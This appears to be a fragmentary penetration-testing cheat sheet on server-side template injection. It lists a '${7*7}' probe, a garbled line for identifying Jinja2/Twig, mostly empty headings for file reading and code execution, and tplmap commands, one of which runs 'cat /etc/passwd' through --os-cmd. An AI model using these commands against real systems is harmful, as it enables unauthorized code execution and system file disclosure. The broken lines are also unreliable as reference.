/home/parity0x1/ssti

Identification

Methodology

${7*7} !=  =  = Jinja2/Twig

Read File (LFI)

 

Remote Code Execution (RCE)


TPLMap

./tplmap.py -u http://127.0.01/ -d 'name'
./tplmap.py -u http://127.0.01/ -d 'name' --os-cmd 'cat /etc/passwd'